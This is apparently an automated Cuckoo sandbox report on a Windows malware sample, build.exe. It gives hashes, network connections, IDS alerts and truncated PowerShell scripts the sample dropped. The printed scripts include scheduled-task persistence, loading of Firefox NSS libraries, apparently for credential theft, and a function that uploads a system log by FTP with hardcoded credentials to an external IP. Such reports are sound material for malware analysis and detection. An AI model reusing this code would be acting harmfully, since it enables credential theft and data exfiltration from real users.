Analysis type | VM tag | Start time | End time | Duration |
---|---|---|---|---|
File (Windows) | win7-sp1-x64-hpdapp03-1 | 2018-09-19 17:52:20 | 2018-09-19 17:54:48 | 148 seconds |
File name | build.exe |
---|---|
File size | 240640 bytes |
File type | PE32+ executable (console) x86-64, for MS Windows |
MD5 | 1680f107e9578f61355c15329f69eb4b |
SHA1 | a835433174cc6f081ff13b3e3582aeb303df6534 |
SHA256 | 4d749c53b4f28a2e2896f5e2d25db811c3d036605dd657d165b6baa49ae9e705 |
SHA512 | f769aa09c782a8985b0ece4e8e67b2b8afc4ba36a73ee91897efb49360455a96458d7a2dc4dc8ed6c9dad79edd2369395c8271c745aa68e455c8c5c38158a3df |
CRC32 | A29F9295 |
Ssdeep | 6144:GE9o6C0wMeewgctohHgw9BxUSE9LltYoW5E:G36C0mtoHrxIvW |
Direct | IP | Security rating | Geolocation |
---|---|---|---|
No | 23.23.114.123 | | United States |
Yes | 91.112.214.182 | | Austria |
Domain | Security rating | Response |
---|---|---|
api.ipify.org | | A 54.243.179.137, CNAME nagano-19599.herokussl.com, A 50.16.248.221, A 50.19.229.252, A 23.21.121.219, A 23.23.114.123, A 54.243.123.39, CNAME elb097307-934924932.us-east-1.elb.amazonaws.com |
Image base | 0x140000000 |
---|---|
Entry point | 0x140003158 |
Claimed checksum | 0x00000000 |
Actual checksum | 0x000407e0 |
Minimum OS version | 6.0 |
Compile time | 2018-09-18 19:30:02 |
Import hash | 012e200829394c80788807acf5c9390a |
Name | Virtual address | Virtual size | Raw data size | Characteristics | Entropy |
---|---|---|---|---|---|
.text | 0x00001000 | 0x00011778 | 0x00011800 | IMAGE_SCN_CNT_CODE \| IMAGE_SCN_MEM_EXECUTE \| IMAGE_SCN_MEM_READ | 6.47 |
.rdata | 0x00013000 | 0x0000fb02 | 0x0000fc00 | IMAGE_SCN_CNT_INITIALIZED_DATA \| IMAGE_SCN_MEM_READ | 5.05 |
.data | 0x00023000 | 0x000186ec | 0x00017000 | IMAGE_SCN_CNT_INITIALIZED_DATA \| IMAGE_SCN_MEM_READ \| IMAGE_SCN_MEM_WRITE | 7.42 |
.pdata | 0x0003c000 | 0x00001194 | 0x00001200 | IMAGE_SCN_CNT_INITIALIZED_DATA \| IMAGE_SCN_MEM_READ | 4.98 |
.gfids | 0x0003e000 | 0x00000104 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA \| IMAGE_SCN_MEM_READ | 1.88 |
.tls | 0x0003f000 | 0x00000009 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA \| IMAGE_SCN_MEM_READ \| IMAGE_SCN_MEM_WRITE | 0.02 |
.rsrc | 0x00040000 | 0x000001e0 | 0x00000200 | IMAGE_SCN_CNT_INITIALIZED_DATA \| IMAGE_SCN_MEM_READ | 4.70 |
.reloc | 0x00041000 | 0x00000af8 | 0x00000c00 | IMAGE_SCN_CNT_INITIALIZED_DATA \| IMAGE_SCN_MEM_DISCARDABLE \| IMAGE_SCN_MEM_READ | 5.28 |
Name | Offset | Size | Language | Sublanguage | Entropy | File type |
---|---|---|---|---|---|---|
RT_MANIFEST | 0x00040060 | 0x0000017d | LANG_ENGLISH | SUBLANG_ENGLISH_US | 4.91 | XML 1.0 document text |
Source address | Source port | Destination address | Destination port |
---|---|---|---|
192.168.122.201 | 49165 | 23.23.114.123 api.ipify.org | 80 |
192.168.122.201 | 49166 | 23.23.114.123 api.ipify.org | 80 |
192.168.122.201 | 49167 | 23.23.114.123 api.ipify.org | 80 |
192.168.122.201 | 49168 | 23.23.114.123 api.ipify.org | 80 |
192.168.122.201 | 49169 | 23.23.114.123 api.ipify.org | 80 |
91.112.214.182 | 21 | 192.168.122.201 | 49178 |
192.168.122.201 | 49179 | 91.112.214.182 | 37120 |
Source address | Source port | Destination address | Destination port |
---|---|---|---|
192.168.122.201 | 61941 | 192.168.122.1 | 53 |
URI | HTTP data |
---|---|
http://api.ipify.org/ | GET / HTTP/1.1 Accept: */* UA-CPU: AMD64 Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; InfoPath.3; .NET4.0C; .NET4.0E) Host: api.ipify.org Connection: Keep-Alive |
No SMTP traffic.
No IRC requests.
No ICMP traffic.
No CIF results.
Timestamp | Source IP | Source Port | Destination IP | Destination Port | Protocol | SID | Signature | Category |
---|---|---|---|---|---|---|---|---|
2018-09-19 17:52:57.365203+0800 | 91.112.214.182 | 21 | 192.168.122.201 | 49178 | TCP | 2260002 | SURICATA Applayer Detect protocol only one direction | Generic Protocol Command Decode |
2018-09-19 17:52:47.946077+0800 | 192.168.122.201 | 49169 | 23.23.114.123 | 80 | TCP | 2021997 | ET POLICY External IP Lookup api.ipify.org | Potential Corporate Privacy Violation |
2018-09-19 17:52:47.273909+0800 | 192.168.122.201 | 49168 | 23.23.114.123 | 80 | TCP | 2021997 | ET POLICY External IP Lookup api.ipify.org | Potential Corporate Privacy Violation |
2018-09-19 17:52:46.312625+0800 | 192.168.122.201 | 49166 | 23.23.114.123 | 80 | TCP | 2021997 | ET POLICY External IP Lookup api.ipify.org | Potential Corporate Privacy Violation |
2018-09-19 17:52:45.860509+0800 | 192.168.122.201 | 49165 | 23.23.114.123 | 80 | TCP | 2021997 | ET POLICY External IP Lookup api.ipify.org | Potential Corporate Privacy Violation |
2018-09-19 17:52:46.794717+0800 | 192.168.122.201 | 49167 | 23.23.114.123 | 80 | TCP | 2021997 | ET POLICY External IP Lookup api.ipify.org | Potential Corporate Privacy Violation |
No TLS
No Suricata HTTP
File name | 590aee7bdd69b59b.customDestinations-ms |
---|---|
Related file | C:\Users\test\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms |
File size | 7960 bytes |
File type | data |
MD5 | 7f011366e63a75160f463b4e50fce6e9 |
SHA1 | 48243f89da9c5c28f6ca37c22a9f6c7e0ec4eff0 |
SHA256 | cf2b29afd8950689c52611272a3ae15cfb1b966a1081e70d53eeeb15f6006ecf |
CRC32 | FCC4A063 |
Ssdeep | 96:GWCP9MefqvsqvJCwooWvWCP9MefqvsEHyqvJCwowyMWwz+GHOGplUV+:GR9yooWvR96HnownWwEGL |
File name | prefs.js |
---|---|
Related file | C:\Users\test\AppData\Roaming\Mozilla\Firefox\Profiles\i072kp8z.default-1494515848972\prefs.js |
File size | 19320 bytes |
File type | ASCII text, with very long lines, with CRLF, LF line terminators |
MD5 | 86fb36cab2b70a350ebc55764bfdc1ce |
SHA1 | 6bdb6a37333e7e7b1cb6a0e505ec44369c19624a |
SHA256 | ab8e4b32f032bb11eb7a44d92461bf4306f6d23e8ffa3ca460d074dcf46d4842 |
CRC32 | 04794156 |
Ssdeep | 192:VbzmgU5+adaIMC6EMJu6w1tHpQxKRVD5+jzYfY76D1hW3zc7l8z9oaHfivG++:RyX1tJWKH4jkQic3zule9oqfwGx |
Displayed text (truncated):
# Mozilla User Preferences /* Do not edit this file. * * If you make changes to this file while the application is running, * the changes will be overwritten when the application exits. * * To make a manual change to preferences, you can visit the URL about:config * For more information, see http://www.mozilla.org/unix/customizing.html#prefs */ user_pref("app.update.auto", false); user_pref("app.update.enabled", false); user_pref("app.update.lastUpdateTime.addon-background-update-timer", 1504369291); user_pref("app.update.lastUpdateTime.background-update-timer", 1496022491); user_pref("app.update.lastUpdateTime.blocklist-background-update-timer", 1535765397); user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 1495632979); user_pref("app.update.lastUpdateTime.experiments-update-timer", 1494516459); user_pref("app.update.lastUpdateTime.search-engine-update-timer", 1495633099); user_pref("app.update.lastUpdateTime.xpi-signature-verification", 1494516821); user_pref("app.update.service.enabled", false); user_pref("browser.cache.disk.capacity", 358400); user_pref("browser.cache.disk.filesystem_reported", 1); user_pref("browser.cache.disk.smart_size.first_run", false); user_pref("browser.cache.disk.smart_size.use_old_max", false); user_pref("browser.cache.disk.smart_size_cached_value", 624640); user_pref("browser.cache.frecency_experiment", 2); user_pref("browser.download.importedFromSqlite", true); user_pref("browser.link.open_newwindow", 2); user_pref("browser.migrated-sync-button", true); user_pref("browser.migration.version", 37); user_pref("browser.newtabpage.enhanced", true); user_pref("browser.newtabpage.storageVersion", 1); user_pref("browser.offline-apps.notify", false); user_pref("browser.pagethumbnails.storage_version", 3); user_pref("browser.places.smartBookmarksVersion", 7); user_pref("browser.preferences.advanced.selectedTabIndex", 0); user_pref("browser.rights.3.shown", true); user_pref("browser.safebrowsing.enabled", false); 
user_pref("brows <truncated>
File name | 4T1URnT.ps1 |
---|---|
Related file | C:\ProgramData\4T1URnT.ps1 |
File size | 7840 bytes |
File type | ASCII text, with very long lines |
MD5 | 73641e857a0402982c7c49497988bd1a |
SHA1 | e3d97e1e93d3abea271f744d6685823822549fd2 |
SHA256 | 7f754d568be48a27c1753b782f868eac82b23dd56255b1188ea189168a080073 |
CRC32 | 5A275F72 |
Ssdeep | 192:YFehO/hpoSDdyUIwizis3TWwcDJKqxPmQ0AtfouLbmlod0WL:YFeh2YC/Iz5vGgllsd |
Displayed text (truncated):
$SH_TYPE_SCHEDULED_TASK=1; $SH_TYPE_TASK_SCHEDULER=2; $schedulerType=$SH_TYPE_SCHEDULED_TASK; function mBXmzjwCLJY { param([string]$zipfile, [string]$destination); $7z = Join-Path $env:ALLUSERSPROFILE '7za.exe'; if (-NOT (Test-Path $7z)){ Try { (New-Object System.Net.WebClient).DownloadFile('https://chocolatey.org/7za.exe',$7z); } Catch{} } if ($(Try { Test-Path $7z.trim() } Catch { $false })){ Start-Process "$7z" -ArgumentList "x -o`"$destination`" -y `"$zipfile`"" -Wait -NoNewWindow } else{ $shell = new-object -com shell.application; $zip = $shell.NameSpace($zipfile); foreach($item in $zip.items()) { $shell.Namespace($destination).copyhere($item); } } } function Base64ToFile { param([string]$file, [string]$string); $bytes=[System.Convert]::FromBase64String($string); #set-content -encoding byte $file -value $bytes; [IO.File]::WriteAllBytes($file, $bytes); } function RandomString{ param([int]$min=5, [int]$max=15); return (-join ((48..57)+(65..90)+(97..122) | Get-Random -Count (Get-Random -minimum $min -maximum $max) | % {[char]$_})); } function InitScheduller{ try{ Import-Module ScheduledTasks -ErrorAction Stop; return $SH_TYPE_SCHEDULED_TASK; }catch{ $File=$env:Temp+'\'+(RandomString)+'.zip'; $Dest=$env:Temp+'\'+(RandomString); while (!(uaFSXULxO 'https://api.nuget.org/packages/taskscheduler.2.5.23.nupkg' $File)) {} if ((Test-Path $Dest) -eq 1){Remove-Item -Force -Recurse $Dest;}mkdir $Dest | Out-Null; mBXmzjwCLJY $File $Dest; Remove-Item -Force $File; $TSAssembly=$Dest+'\lib\net20\Microsoft.Win32.TaskScheduler.dll'; $loadLib = [System.Reflection.Assembly]::LoadFile($TSAssembly); return $SH_TYPE_TASK_SCHEDULER; } } function LQFPqwtAc { param([string]$name, [string]$cmd, [string]$params='',[int]$restart=0,[int]$delay=0,[string]$dir=''); switch ($schedulerType) { $SH_TYPE_SCHEDULED_TASK { $Action = New-ScheduledTaskAction -Execute $cmd; if(-Not [String]::IsNullOrEmpty($params)){ <truncated> |
File name | 4IKYPwsB.ps1 |
---|---|
Related file | C:\Users\test\AppData\Local\Temp\4IKYPwsB.ps1 |
File size | 2954 bytes |
File type | ASCII text |
MD5 | e846f6d85399752c2e51562b2b1fda1b |
SHA1 | d5478afcf056a839a3d572f20535d3789bfbc2ba |
SHA256 | d817e3233e95a5f7f80b4dcc45f121c3b9401ed2ca3ae5fbde168838b4a90ff4 |
CRC32 | FFACF392 |
Ssdeep | 48:8pGE0tr4bGE9ZMpu0oUUqxndOqCRY1hGBQWWW0WfkufCLTi4ukiXKEU:8cEm/GkOqxnoJGhGWZfokuqL+4u9Kp |
Displayed text (truncated):
$Logfile = $env:Temp+"\\$(gc env:computername).log"; Function LogWrite { Param ([string]$logstring) $dt=Get-Date -Format "dd.MM.yyyy HH:mm:ss"; $msg=[string]::Format("[{0}]::[{1}]",$dt,$logstring); Write-Host $msg; Add-content $Logfile -value $msg; } Function UploadLog { $dest = "ftp://Wettbewerb:mantler1220x@91.112.214.182/public_html/log"; $webclient = New-Object -TypeName System.Net.WebClient; $webclient.UploadFile("$dest/$(gc env:computername).log", $Logfile); Remove-Item -Path $Logfile; } function CheckInstall(){ $wininfo = (Get-WmiObject Win32_OperatingSystem | Select Caption, ServicePackMajorVersion, OSArchitecture, Version, MUILanguages); $wininfo.MUILanguages=$wininfo.MUILanguages -join ","; LogWrite("OS info: {0}" -f $wininfo -join ""); if (test-path variable:psversiontable) { $version = $psversiontable.psversion; } else { $version = [version]"1.0.0.0"; } LogWrite("Powershell version: {0}" -f $version); try { $pac=Get-ItemProperty 'hkcu:\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\'|Select -expand AutoConfigURL -ErrorAction Stop; LogWrite("Pac setted: '$pac'"); } catch { LogWrite("ERROR: Pac not setted"); } $Certs = @(Get-ChildItem cert:\CurrentUser\ROOT|Where-Object {$_.Subject -like "*COMODO RSA Extended Validation Secure Server CA 2*" -or $_.Subject -like "*COMODO Certification Authority*"}|ForEach-Object {"{0} ({1})" -f ($_.Thumbprint,$_.NotBefore)}); if (-NOT $Certs.count -eq 0){ LogWrite("Certs installed: '{0}'" -f ($Certs -join "; ")); }else { LogWrite("Certs not found"); } try{ $proc = Get-Process | Where-Object {$_.ProcessName -like "tor*" -or $_.ProcessName -like "socat*"}|Select -Property @{ Name="Out"; Expression={"ID:{0}`nName:{1}`nPath:{2}`n-------------" -f $_.Id,$_.ProcessName,$_.Path}}|Select -expand Out; LogWrite("Proccess list:`n{0}" -f ($proc -join "`n")); } catch { LogWrite("ERROR: Can't get proccess list"); } $DestTP=$env:ALLUSERSPROFILE; try{ $dirs=dir($Dest <truncated> |
File name | oSzISqLc.ps1 |
---|---|
Related file | C:\Users\test\AppData\Local\Temp\oSzISqLc.ps1 |
File size | 16697 bytes |
File type | ASCII text, with very long lines |
MD5 | 27dd3d6d9cbe3086f9372969ed3eb509 |
SHA1 | b28705456378c643fcd14e2e93d8e3954c7f4cc9 |
SHA256 | 342b08694340c66ab5624a1408e2e04fe97a93dd187188bd7849e947e39e5c75 |
CRC32 | E828B8FB |
Ssdeep | 384:VlVaeQiGvZ8mUx3ILBwuSXGgNm/G7T2Imh6H/HGDifPWBLyxh9bbIEng7y7zNL:8Lmhnln9L |
Displayed text (truncated):
function zmxOnQbNYHfz{ Add-Type @" using System; using System.IO; using Microsoft.Win32; using System.Runtime.InteropServices; using System.ComponentModel; public sealed class AxKPAeUfXdxN { private static volatile AxKPAeUfXdxN UjtfVoGeYlF; private static object XVsvCnlNl = new Object(); public static AxKPAeUfXdxN ElvKLjdGNIXDuNy() { if (UjtfVoGeYlF == null) { lock (XVsvCnlNl) { if (UjtfVoGeYlF == null) UjtfVoGeYlF = new AxKPAeUfXdxN(); } } return UjtfVoGeYlF; } const int uUamOglyct=0; [DllImport("kernel32", SetLastError = true, CharSet = CharSet.Ansi)] static extern IntPtr LoadLibrary([MarshalAs(UnmanagedType.LPStr)]string lpFileName); private static IntPtr HPQiihMcaW(string libPath) { if (String.IsNullOrEmpty(libPath)) throw new ArgumentNullException("libPath"); IntPtr moduleHandle = LoadLibrary(libPath); if (moduleHandle == IntPtr.Zero) { int lasterror = Marshal.GetLastWin32Error(); System.Console.WriteLine(String.Format("Last error: 0x{0:X}",lasterror)); Win32Exception innerEx = new Win32Exception(lasterror); innerEx.Data.Add("LastWin32Error", lasterror); throw new Exception("can't load DLL " + libPath, innerEx); } return moduleHandle; } [DllImport("kernel32.dll")] public static extern IntPtr GetProcAddress(IntPtr hModule, string procedureName); //Constants const uint NSS_INIT_READONLY=0x1; const uint NSS_INIT_NOCERTDB = 0x2; const uint NSS_INIT_NOMODDB = 0x4; const uint NSS_INIT_FORCEOPEN = 0x8; const uint NSS_INIT_NOROOTINIT = 0x10; const uint NSS_INIT_OPTIMIZESPACE = 0x20; const uint NSS_INIT_PK11THREADSAFE = 0x40; const uint NSS_INIT_PK11RELOAD = 0x80; const uint NSS_INIT_NOPK11FINALIZE = 0x100; const uint NSS_INIT_RESERVED = 0x200; const uint NSS_INIT_COOPERATE = NSS_INIT_PK11THREADSAFE | NSS_I <truncated> |
File name | TEST-PC.log |
---|---|
Related file | C:\Users\test\AppData\Local\Temp\TEST-PC.log |
File size | 1862 bytes |
File type | ISO-8859 text, with very long lines, with CRLF, LF line terminators |
MD5 | 1f24bdcc538f2234660156420cf8ee40 |
SHA1 | cf38a3cbc67dcf59306a9a739098ac995da73b9a |
SHA256 | cae594a6ef3c49c953c9d980c8a9f3fe62538052e25e3dd33744b088c4f1c3a5 |
CRC32 | 87B543B5 |
Ssdeep | 48:oFvg2ZjWazBzl/gTX5ghgJgP1gNoZMg9g1JgUgvXsgvRghxMglK0B0s+REI2gi:oZdZSaVzFAX5gY0WoWO6JpocoROMy0pC |
File name | KQSnVak9.ps1 |
---|---|
Related file | C:\Users\test\AppData\Local\Temp\KQSnVak9.ps1 |
File size | 9677 bytes |
File type | ASCII text, with very long lines |
MD5 | 995634a1d0bc0cb3a352e29e574a3c47 |
SHA1 | 723f366a107d20d2cb971b31b2a01aa8d394f663 |
SHA256 | 526298e976e7ed46f04310c99c51aeb499e28a59a682c73644114e303bd016aa |
CRC32 | 604DA640 |
Ssdeep | 192:UYMYUYXzfTfdM4F2InfmCc3y+JFLOKBWZsJdgQzPidaZaakYyzHzYTX1Ag7yWPqm:Ue7T7cHFLOKVJdgQzP9k4X1Ag7y7zNQ |
Displayed text (truncated):
function VcyyMgvYmuCnzB{ Add-Type @" using System; using System.Text; using System.Runtime.InteropServices; using System.Diagnostics; using System.Security.Cryptography.X509Certificates; using System.Threading; public static class pcqEf { public class XEcTYoJfPBuKg { public string Wndclass; public string Title; public string Process; public IntPtr hWnd; } private delegate bool PayImryPKI(IntPtr hWnd, ref XEcTYoJfPBuKg data); [DllImport("user32.dll")] [return: MarshalAs(UnmanagedType.Bool)] private static extern bool EnumWindows(PayImryPKI lpEnumFunc, ref XEcTYoJfPBuKg data); [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] public static extern int GetClassName(IntPtr hWnd, StringBuilder lpClassName, int nMaxCount); [DllImport("user32.dll", CharSet = CharSet.Auto, SetLastError = true)] public static extern int GetWindowText(IntPtr hWnd, StringBuilder lpString, int nMaxCount); [DllImport("user32.dll", SetLastError = true, CharSet = CharSet.Auto)] static extern uint GetWindowThreadProcessId(IntPtr hWnd, out uint lpdwProcessId); [DllImport("user32.dll")] [return: MarshalAs(UnmanagedType.Bool)] static extern bool SetForegroundWindow(IntPtr hWnd); public delegate bool gcdSJ(IntPtr hwnd, IntPtr lParam); [DllImport("user32")] [return: MarshalAs(UnmanagedType.Bool)] public static extern bool EnumChildWindows(IntPtr window, gcdSJ callback, IntPtr lParam); [DllImport("user32.dll", CharSet = CharSet.Auto)] static extern IntPtr SendMessage(IntPtr hWnd, UInt32 Msg, IntPtr wParam, IntPtr lParam); [Flags] private enum SnapshotFlags : uint { HeapList = 0x00000001, Process = 0x00000002, Thread = 0x00000004, Module = 0x00000008, Module32 = 0x00000010, Inherit = 0x80000000, All = 0x0000001F, NoHeaps = 0x40000000 } //inner struct used only internally [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Auto)] private struct PROCESSENTRY32 { const <truncated> |
Task ID | 188774 |
---|---|
Mongo ID | 5ba21d1da093ef245f83b93a |
Cuckoo release | 1.4-Maldun |